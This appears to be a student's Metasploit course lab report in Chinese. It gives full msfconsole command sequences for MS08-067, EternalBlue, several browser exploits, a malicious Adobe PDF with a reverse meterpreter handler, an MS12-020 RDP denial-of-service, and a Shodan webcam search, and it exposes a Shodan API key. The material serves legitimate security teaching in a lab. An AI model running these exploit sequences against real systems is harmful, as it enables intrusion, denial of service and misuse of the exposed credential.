zoukankan      html  css  js  c++  java
  • 2019-2020-2 网络对抗技术 20175224 Exp6 MSF基础应用

    目录


    一、实验内容说明及基础问题回答

    二、实验过程

    • 主动攻击实践
      • ms08_067
      • ms17_010
    • 针对浏览器的攻击
      • ms11_050
      • browser_autopwn
      • ms10_046
    • 对客户端的攻击
      • Adobe
    • 辅助模块的使用
      • 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块(唯)
      • 网络摄像头的查找

    三、实验总结



    一、实验基础问题回答

    (1)用自己的话解释什么是 exploit , payload , encode.

    • exploit
      渗透攻击模块,利用系统服务应用中的漏洞取得权限
    • payload
      一段代码,用于渗透之后在目标主机上执行
    • encode
      用来对payload进行编码,主要是为了避免“坏字符”和做到免杀


    二、实验过程

    1.主动攻击实践

    (1)ms08_067

    • 攻击机kali——192.168.182.128  靶机:win2000——192.168.1.5
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令
    use exploit/windows/smb/ms08_067_netapi
    show payloads
    set payload generic/shell_reverse_tcp //tcp反向回连
    set LHOST 192.168.182.128 //攻击机ip
    set LPORT 5224//攻击端口
    set RHOST 192.168.1.5 //靶机ip,特定漏洞端口已经固定
    set target 0 //自动选择目标系统类型,匹配度较高
    exploit //攻击
    • 成功:
    • 输入ipconfig/all,获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS

    (2)ms17_010

    • 攻击机kali——192.168.182.128  靶机:Microsoft Windows 7——192.168.182.44
    • 进入msfconsole,输入以下指令

    use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
    show payloads //显示可用攻击载荷
    set payload generic/shell_reverse_tcp //选择攻击载荷
    options //查看配置信息
    set LHOST 192.168.182.128 //设置监听地址
    set RHOSTS 192.168.182.44 //设置靶机地址
    exploit //开始攻击

    2.针对浏览器的攻击

    (1)ms11_050

    • 攻击机:kali  靶机:Microsoft Windows 7
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    set payload windows/meterpreter/reverse_http //http反向回连
    set LHOST 192.168.182.128 //攻击机ip
    set LPORT 5224 //攻击端口固定
    set URIPATH 5224axy //统一资源标识符路径设置
    exploit
    • 但设置Internet选项后会出现IE浏览器的错误

    (2)browser_autopwn

    • 攻击机:kali  靶机:win2000
    • 换一个漏洞`实施browser_autopwn模块 `
    • 攻击机里进入msfconsole,然后分别输入:
    use auxiliary/server/browser_autopwn2
    set SRVHOST 192.168.182.128
    set URIPATH auto
    show options
    • 开始攻击,可以看到msf在不停的尝试不同的payload
    • 尝试成功,输出了可被访问的URL:http://192.168.182.128:8080/auto并启动服务器
    • 如图:
    (3)ms10_046
    • 攻击机:kali  靶机:WindowsXP 
    • 输入以下指令:
    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用浏览器ms10_046漏洞
    set payload windows/meterpreter/reverse_http //http反向回连
    set LHOST 192.168.182.128//攻击机ip
    set LPORT 5224 //攻击端口固定
    exploit
    • 在靶机的浏览器上输入:http://192.168.182.128:80/
    • 选择session,建立会话:

    3.对客户端的攻击

    (1)Adobe

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    use windows/fileformat/adobe_cooltype_sing
    set payload windows/meterpreter/reverse_tcp //tcp反向回连
    set LHOST 192.168.182.128 //攻击机ip
    set LPORT 5224//攻击端口
    set FILENAME 20175224.pdf //设置生成pdf文件的名字
    exploit //攻击
    • 将生成的pdf文件拷贝到靶机上
    • 在kali上输入back退出当前模块,进入监听模块,输入以下命令:
    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp //tcp反向连接
    set LHOST 192.168.182.128 //攻击机ip
    set LPORT 5224 //攻击端口固定
    exploit
    • 在靶机上打开20175224.pdf文件
    • 攻击机显示攻击成功
    • 靶机关闭PDF文件则失去权限

    4.辅助模块的使用

    (1)成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块

    • 攻击:kali  靶机:win2008
    • 使用命令show auxiliary查看所有的辅助模块
    • 使用MS12-020(CVE-2012-0002)蓝屏攻击
    • 进入msfconsole
    • 输入以下指令:
    search ms12-020 //搜索漏洞
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用漏洞
    options //查看配置信息
    set RHOST 192.168.182.128 //设置攻击IP
    exploit //开始攻击
    • 攻击成功

    (2)网络摄像头的查找

    • shodan官网注册账号,登陆查看账户API后设置APIKEY set F9MYLmsRI1qvIGG9LJvjYndut8hFvAB4
    gather/shodan_search //查找网络摄像头
    use auxiliary/gather/shodan_search //使用辅助模块
    show options //查看需要输入的参数
    set QUERY "webcamXP"
    set RHOSTS 192.168.182.138
    run


    三、实验总结

    (1)离实战还缺些什么技术或步骤?

            现在对漏洞的了解还很匮乏,更不要说利用漏洞去攻击了。而且实验都是在防火墙等安全防护都关闭的情况下进行的,对于日常其实实现起来应该比较困难。在利用后门程序之前也应该对其进行检测。

    (2)心得体会

            本次实验学会了如何搜索漏洞,并在现有的漏洞环境下,尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程中,其实找适合的虚拟机特别关键,整个过程耗费的时间大量集中在尝试不同虚拟机使其得以被攻击。不乏看出,打过补丁的虚拟机其抗攻击能力更强,这也提醒我们应时常更新配置。

  • 相关阅读:
    [kuangbin带你飞]专题十二 基础DP1
    bits/stdc++.h
    第七届 山东省ACM Execution of Paladin(水题)
    poj 1523 SPF【点双连通求去掉割点后bcc个数】
    hdoj 5112 A Curious Matt
    【转】我,一个写代码的
    poj 3177 Redundant Paths【求最少添加多少条边可以使图变成双连通图】【缩点后求入度为1的点个数】
    数据结构第二次上机实验【链表实现多项式的加法和乘法】
    hdoj 4612 Warm up【双连通分量求桥&&缩点建新图求树的直径】
    hdoj 3849 By Recognizing These Guys, We Find Social Networks Useful【双连通分量求桥&&输出桥&&字符串处理】
  • 原文地址:https://www.cnblogs.com/axyaxy/p/12787889.html
Copyright © 2011-2022 走看看